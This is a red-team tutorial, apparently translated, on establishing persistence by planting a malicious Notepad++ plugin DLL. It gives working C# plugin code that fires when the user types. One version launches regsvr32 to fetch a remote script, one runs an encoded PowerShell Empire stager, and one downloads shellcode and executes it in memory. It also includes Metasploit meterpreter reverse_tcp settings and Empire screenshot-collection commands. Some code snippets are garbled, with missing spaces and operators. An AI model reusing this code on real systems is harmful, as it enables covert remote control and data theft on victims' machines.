Title: Use Notepad++ custom plugin for permission maintenance

 0x00 Preface 

Notepad++ is a popular Windows text editor that has extensions in plug-in mode. It is not uncommon in Windows environments, especially in hosts of developers and IT staff. In addition to providing the collection of important information for Red Team personnel, it can also be used as permission maintenance by using any plug-in that loads or scripts from remote commands.

0x01 Basic message box example

The Notepad++ plug-in can be used to extend the functionality of Notepad++. By default, users can install the required plugins in the list of Notepad++ trusted plugins, but can also run the install custom plugins without any verification, giving developers the flexibility to use an extensible text editor. The plugin is in the form of a DLL file. To install a custom plugin, just put the DLL into %PROGRAMFILES%\Notepad++\plugins\pluginName\pluginName.dll.

The benefit is that loading or activating the plugin does not require user interaction. The disadvantage is that local administrator permission is required to be written to the directory. It should be noted that in order to load the plugin, the folder name and DLL file name need to be the same. For Red Team personnel, there is no need to write malicious plugins from scratch, because the Notepad++ plugin package can be used as a modification template. When a specific event occurs, there are several APIs that can be used to perform any action. SCI_ADDTEXTAPI triggers a custom command when entering characters in notepad++. In the following example, a message box will pop up when a character is inserted.

You can use https://github.com/kbilsted/NotepadPlusPluginPack.Net/blob/master/Visual%20Studio%20Project%20Template%20C%23/Main.cs

Use the .NET template to modify the code under OnNotification

The modified code of is as follows: class Main{ static bool ExecuteOnce=true; public static void OnNotification(ScNotification notification) { if (notification.Header.Code==(uint)SciMsg.SCI_ADDTEXT ExecuteOnce) { MessageBox.Show('Persistence via Notepad++ - Visit https://pentestlab.blog'); ExecuteOnce=!ExecuteOnce; } }

Or: class Main{ static bool firstRun=true; public static void OnNotification(ScNotification notification) { if (notification.Header.Code==(uint)SciMsg.SCI_ADDTEXT firstRun) { using var process=Process.GetCurrentProcess(); MessageBox.Show($'Hello from {process.ProcessName} ({process.Id}).'); firstRun=!firstRun; } } Notepad++ Insert plugin message box example Compiling the code will generate a DLL file that needs to be run under super administrator privileges, as write permissions are required to write the plugin to the relevant subfolder.

dir 'C:\Program Files\Notepad++\plugins\pentestlab' Notepad++ Plugin Location The next time you start Notepad++ and enter characters, a message box will pop up, showing that the code has been compiled and executed successfully.

Notepad++ Execution successfully

0x02  MSF rebound example

You can also execute fileless payloads to establish a communication channel. Here you can use the Windows Regsvr32 binary to load the execution script from a remote location. The Metasploit framework supports this utilization through the web delivery module.

use exploit/multi/script/web_delivery

set target 2

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 10.0.0.3

set LPORT 4444

Run can slightly modify the commands using the required parameters to execute regsvr32

classMain{ staticboolfirstRun=true;publicstaticvoidOnNotification(ScNotification notification){if(notification.Header.Code==(uint)SciMsg.SCI_ADDTEXT firstRun){stringstrCmdText;strCmdText='/s /n /u /i:http://10.0.0.3:8080/nHIcvfz6N.sctscrobj.dll';Process.Start('regsvr32', strCmdText);firstRun=!firstRun;}} Notepad++ Regsvr32 method Similarly, as in the initial example, when new characters are entered in Notepad++, the event that executes the command will be triggered

Notepad++ Persistence Trigger Meterpreter will perform session monitoring and establish communication channels.

Notepad++ Regsvr32 Meterpreter executes the following command to start interaction with the target host

sessions

sessions -i 1

pwd

getuid Notepad++ Meterpreter shell

0x03 Empire rebound shell example

In a similar way, Empire C2 can be used to generate various stager files. These files usually contain a base64 command that can be executed in the PowerShell process. The following is the stager method as an example:

usestager windows/launcher_sct Empire Stager module stager should point to a listener that has been run in Empire, and executing the command will write the file to the "generated-stagers" folder.

set Listener http

execute Empire – Stager Configuration and Generation You can upload the generated launcher.sct file to the target system, and then execute it through the regsvr32 command or you can copy the base64 generated in the launcher.sct file, and use this command internally to avoid the software-killing check.

Empire– PowerShell Base64 Payload Sample Code: classMain{ static bool ExecuteOnce=true;publicstaticvoidOnNotification(ScNotification notification){if(notification.Header.Code==(uint)SciMsg.SCI_ADDTEXT firstRun){stringstrCmdText;strCmdText='-noP -sta -w -l enc base64 command execution code';Process.Start('powershell', strCmdText);ExecuteOnce=!ExecuteOnce;}} Notepad++ – Plugin After the command is triggered by Empire Stager, a new interactive shell will appear in Empire.

agents The commands of the Notepad++ EmpireEmpire module can also have information collection functions, such as screenshots of the host desktop and information such as username, connection string or URL.

usemodule powershell/collection/screenshot

set Agent notepad

execute Notepad++ Empire screenshot Notepad++ screenshot

0x04  cobaltstike rebound shell example

Replace MessageBox with shellcode to load through cobasltsike, the code is as follows:

if (notification.Header.Code==(uint)SciMsg.SCI_ADDTEXT firstRun)

{

using var client=new WebClient();

var buf=client.DownloadData('http://172.19.215.47/shellcode');

var hMemory=VirtualAlloc(

IntPtr.Zero,

(uint)buf.Length,

AllocationType.Reserve | AllocationType.Commit,

MemoryProtection.ReadWrite);

Marshal.Copy(buf, 0, hMemory, buf.Length);

_=VirtualProtect(

hMemory,

(uint)buf.Length,

MemoryProtection.ExecuteRead,

out _);

_=CreateThread(

IntPtr.Zero,

0,

hMemory,

IntPtr.Zero,

0,

out _);

firstRun=!firstRun;

}

0x05  Summary

It should be noted that one disadvantage of this permission persistence technique is that the user requires the user to type characters and therefore may not receive a rebound shell frequently.